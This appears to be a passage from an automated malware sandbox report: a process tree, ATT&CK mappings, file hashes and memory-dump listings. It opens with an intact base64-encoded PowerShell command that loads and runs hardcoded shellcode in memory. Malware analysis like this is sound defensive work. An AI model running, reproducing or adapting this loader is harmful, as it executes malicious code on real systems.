      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAA4AEEAMgBCACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAOABBADIAQgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiADgALAAwAHgAMgA1ACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAZQAwACwAMAB4AGQAYgAsADAAeABjAGMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAYgAsADAAeABiADYALAAwAHgANgA5ACwAMAB4ADEANQAsADAAeABlAGYALAAwAHgAYQBmACwAMAB4AGUAMQAsADAAeABkADYALAAwAHgAMABmACwAMAB4ADMAMAAsADAAeAA5AGUALAAwAHgAZQA3ACwAMAB4AGQAZAAsADAAeABiADkALAAwAHgAYgBiACwAMAB4ADYAYwAsADAAeAA2AGEALAAwAHgAZQBiACwAMAB4ADcAMwAsADAAeABlADYALAAwAHgAMwBlACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAYQBhACwAMAB4AGEAYQAsADAAeAAxADcALAAwAHgANAA4ACwAMAB4ADAAMAAsADAAeABmADQALAAwAHgAYQBjACwAMAB4AGMANAAsADAAeABiAGQALAAwAHgAYwA5ACwAMAB4ADQAZAAsADAAeAAxADkALAAwAHgANwBlACwAMAB4ADgANQAsADAAeAA4AGUALAAwAHgAMwBiACwAMAB4ADAAMgAsADAAeABkADcALAAwAHgAYwAyACwAMAB4ADkAYgAsADAAeAAzAGIALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABkAGQALAAwAHgANwBjACwAMAB4AGUAZgAsADAAeAA1AGQALAAwAHgAMwAyACwAMAB4AGQAMAAsADAAeABiADgALAAwAHgAMQA2ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYwBkACwAMAB4ADYAYgAsADAAeAAyADMALAAwAHgAZQA3ACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAMQBiACwAMAB4ADkAZgAsADAAeAAyADQALAAwAHgAMwA3ACwAMAB4AGUAZgAsADAAeAAxADMALAAwAHgAMgA3ACwAMAB4ADYAOAAsADAAeAA5AGIALAAwAHgAZgA0ACwAMAB4ADAANwAsADAAeABkADgALAAwAHgAMQA3ACwAMAB4ADQAYwAsADAAeAA1AGYALAAwAHgAZAA5ACwAMAB4AGYANAAsADAAeABjADgALAAwAHgAOQA2ACwAMAB4AGEAZAAsADAAeABjADYALAAwAHgAZQAzACwAMAB4AGQANwAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4ADMAMAAsADAAeABhAGMALAAwAHgAOQA5ACwAMAB4ADEANAAsADAAeAAwADkALAAwAHgANwAyACwAMAB4ADMANQAsADAAeAA1ADkALAAwAHgAYQA1ACwAMAB4ADcAZgAsADAAeAA0ADcALAAwAHgAOQBkACwAMAB4ADAAMgAsADAAeAA5AGYALAAwAHgAMwAyACwAMAB4AGQANQAsADAAeAA3ADAALAAwAHgAMgAyACwAMAB4ADQANQAsADAAeAAyAGUALAAwAHgAMABhACwAMAB4AGYAOAAsADAAeABjADAALAAwAHgAYgAxACwAMAB4AGEAYwAsADAAeAA4AGIALAAwAHgANwAzACwAMAB4ADEANgAsADAAeAA0AGMALAAwAHgANQA4ACwAMAB4AGUANQAsADAAeABkAGQALAAwAHgANAAyACwAMAB4ADEANQAsADAAeAA2ADEALAAwAHgAYgA5ACwAMAB4ADQANgAsADAAeABhADgALAAwAHgAYQA2ACwAMAB4AGIAMQAsADAAeAA3ADMALAAwAHgAMgAxACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAZgAyACwAMAB4ADcAMQAsADAAeAA2AGUALAAwAHgAYgAyACwAMAB4ADUAZQAsADAAeAAyADIALAAwAHgAMABmACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgAOAA1ACwAMAB4ADMAMAAsADAAeABmADMALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAA5ADUALAAwAHgANwBmACwAMAB4ADAAMQAsADAAeAA2AGQALAAwAHgAYQA5ACwAMAB4ADcAZgAsADAAeABkADkALAAwAHgAOQAyACwAMAB4AGYANwAsADAAeAAxADcALAAwAHgAMQA1ACwAMAB4ADUAZQAsADAAeAAwADgALAAwAHgAZQA4ACwAMAB4ADMAMQAsADAAeABlADkALAAwAHgANwBiACwAMAB4AGQAYQAsADAAeAA5AGUALAAwAHgANAAxACwAMAB4ADEANAAsADAAeAA1ADYALAAwAHgANQA2ACwAMAB4ADQAZgAsADAAeABlADMALAAwAHgAZQBmACwAMAB4ADcAMAAsADAAeAA3ADAALAAwAHgAMwBiACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAOABmACwAMAB4AGIAYwAsADAAeABhADgALAAwAHgAMwA4ACwAMAB4ADQAYgAsADAAeABlADgALAAwAHgAZgA4ACwAMAB4ADUAMgAsADAAeAA3AGEALAAwAHgAOQAxACwAMAB4ADkAMgAsADAAeABhADIALAAwAHgAOAAzACwAMAB4ADQANAAsADAAeAAwAGUALAAwAHgAYQA5ACwAMAB4ADEAMwAsADAAeABhADcALAAwAHgANgA3ACwAMAB4AGEAYwAsADAAeAA4AGQALAAwAHgANABmACwAMAB4ADcAYQAsADAAeABhAGYALAAwAHgANAAwACwAMAB4AGMAYwAsADAAeABmADMALAAwAHgANAA5ACwAMAB4ADMAMgAsADAAeABiAGMALAAwAHgANQAzACwAMAB4AGMANgAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEANAAsADAAeABiADYALAAwAHgAOQBhACwAMAB4ADYANgAsADAAeAA5AGIALAAwAHgAZQA5ACwAMAB4AGIAYQAsADAAeAA4ADgALAAwAHgANwAxACwAMAB4ADgAMgAsADAAeAA1ADAALAAwAHgANgA3ACwAMAB4ADIAYwAsADAAeABmAGEALAAwAHgAYwBjACwAMAB4ADEAZQAsADAAeAA3ADUALAAwAHgANwAwACwAMAB4ADYAZAAsADAAeABkAGUALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeABhAGQALAAwAHgANQA0ACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANgAzACwAMAB4ADkAZAAsADAAeAAyAGQALAAwAHgAMQAyACwAMAB4ADEAMwAsADAAeAA2AGQALAAwAHgANwA4ACwAMAB4ADQAOAAsADAAeABiADUALAAwAHgANwAyACwAMAB4ADUANgAsADAAeABlADcALAAwAHgAMwA5ACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYQBlACwAMAB4ADYAZQAsADAAeAA5AGYALAAwAHgANQBmACwAMAB4ADkANwAsADAAeAA1ADgALAAwAHgAMAAwACwAMAB4ADkAZgAsADAAeABmADIALAAwAHgAZAAzACwAMAB4ADgAOQAsADAAeAAzADUALAAwAHgAYgBkACwAMAB4ADgAYgAsADAAeABmADUALAAwAHgAZAA5ACwAMAB4ADMAZAAsADAAeAA0AGIALAAwAHgAYQAwACwAMAB4AGIAMwAsADAAeAAzAGQALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeABlADAALAAwAHgANgBkACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgAMwBkACwAMAB4ADAAMgAsADAAeABjAGIALAAwAHgAYwBlACwAMAB4AGIAZQAsADAAeAA3ADMALAAwAHgAYgA4ACwAMAB4ADUAOQAsADAAeABkADcALAAwAHgANwA5ACwAMAB4AGUANwAsADAAeABhAGUALAAwAHgANwA4ACwAMAB4ADgAMQAsADAAeABjADIALAAwAHgAMgBlACwAMAB4ADQANAAsADAAeAA1ADQALAAwAHgAMgBhACwAMAB4ADQANQAsADAAeABhADQALAAwAHgANgA0ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABoAFoAaQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAaABaAGkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGgAWgBpACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fxoe5tbx\fxoe5tbx.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3956
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES954B.tmp" "c:\Users\Admin\AppData\Local\Temp\fxoe5tbx\CSCEB71BCF5785F4ADCBCE2EADCEE494B43.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES954B.tmp

Filesize
1KB

MD5
c1a17265e36fd0bf026c239d2d980a51

SHA1
ac24c1d0703ae77d561d2c2ae62591d45c0ea823

SHA256
a1adcc53e0008d546782b0a6652450df62a89074301880d1c28bd7d7ced7fe00

SHA512
4ab0d7ca23a14bae3b6548c65fc5189e6285a3232d8d48bd0fd8f2547239f90b4693cb9627fee06d2d671c18bc8d5c49fd2d391bf241f68843fee7dd665099f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwd2fflz.xfs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fxoe5tbx\fxoe5tbx.dll

Filesize
3KB

MD5
68e7a29261eb250bd855902c0ca6c17a

SHA1
5cc11768cdc547b39f69778ffd8245c5de3fb016

SHA256
d6c551ae4549b14c1a50485636e746114130ebfa02900288711fe925ca4827c7

SHA512
80bac47ac39bee3cdc2274a55ec5d1e9a1c9001a1fb09c337db2be2675c3bf6061fef5c5be52458d8b3ff1177597a159dd7e1af1aefb9a47c96372d82fb6c82f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fxoe5tbx\CSCEB71BCF5785F4ADCBCE2EADCEE494B43.TMP

Filesize
652B

MD5
eb57baad90aa80c6c9eb1fe74e92e042

SHA1
90d70a59ca380cdde4cdd143cac489aa9ec395ab

SHA256
d9ee55fefd94aee537685a94a833aec1528e7979123e8541c74b2d5a5b6093f1

SHA512
e5aaf7634e052648b76ca91d89a312a57516764d5848381536a81180f05fe8ff75449c31feb41aafe533986fb5ef7866eb6aa68353a5d382fe1946bc2301448c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fxoe5tbx\fxoe5tbx.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fxoe5tbx\fxoe5tbx.cmdline

Filesize
369B

MD5
9f110da7c52693e86256ed3271c63871

SHA1
083963145426ece9167fc0e6e51bd0d410ba2081

SHA256
ff34ea7f1191ad27e88a44d8c44e1951999bef1c7e8017976daf7ac99c867d3f

SHA512
c6d6f6d07fe272e5f076bc399ad70ab1d0fcbd67bfbe3c961be63e2209f7df9264cd1f3662f9a197e0567c65442413ed1f32dccb47f9b70bed3a56118c2999fa

Download Submit
memory/4056-15-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

Filesize
4KB

Download
memory/4056-36-0x0000000005FE0000-0x0000000005FFA000-memory.dmp

Filesize
104KB

Download
memory/4056-16-0x00000000044E0000-0x0000000004516000-memory.dmp

Filesize
216KB

Download
memory/4056-17-0x0000000074DC0000-0x0000000075570000-memory.dmp

Filesize
7.7MB

Download
memory/4056-18-0x0000000004CA0000-0x00000000052C8000-memory.dmp

Filesize
6.2MB

Download
memory/4056-19-0x0000000074DC0000-0x0000000075570000-memory.dmp

Filesize
7.7MB

Download
memory/4056-20-0x0000000004C00000-0x0000000004C22000-memory.dmp

Filesize
136KB

Download
memory/4056-21-0x00000000052D0000-0x0000000005336000-memory.dmp

Filesize
408KB

Download
memory/4056-22-0x0000000005340000-0x00000000053A6000-memory.dmp

Filesize
408KB

Download
memory/4056-32-0x0000000005480000-0x00000000057D4000-memory.dmp

Filesize
3.3MB

Download
memory/4056-33-0x0000000005AC0000-0x0000000005ADE000-memory.dmp

Filesize
120KB

Download
memory/4056-34-0x0000000005AE0000-0x0000000005B2C000-memory.dmp

Filesize
304KB

Download
memory/4056-35-0x0000000007100000-0x000000000777A000-memory.dmp

Filesize
6.5MB

Download
memory/4056-55-0x0000000074DC0000-0x0000000075570000-memory.dmp

Filesize
7.7MB

Download
memory/4056-54-0x0000000074DCE000-0x0000000074DCF000-memory.dmp

Filesize
4KB

Download
memory/4056-53-0x00000000060C0000-0x00000000060C1000-memory.dmp

Filesize
4KB

Download
memory/4056-50-0x0000000006050000-0x0000000006058000-memory.dmp

Filesize
32KB

Download
memory/4740-12-0x00007FF8D0500000-0x00007FF8D0FC1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-3-0x000002B37A700000-0x000002B37A722000-memory.dmp

Filesize
136KB

Download
memory/4740-52-0x00007FF8D0500000-0x00007FF8D0FC1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-13-0x00007FF8D0500000-0x00007FF8D0FC1000-memory.dmp

Filesize
10.8MB

Download
memory/4740-14-0x00007FF8D0500000-0x00007FF8D0FC1000-memory.dmp

Filesize
10.8MB

Download
memory/4768-1-0x0000000000850000-0x000000000085A000-memory.dmp

Filesize
40KB

Download
memory/4768-44-0x00007FF8D0503000-0x00007FF8D0505000-memory.dmp

Filesize
8KB

Download
memory/4768-0-0x00007FF8D0503000-0x00007FF8D0505000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads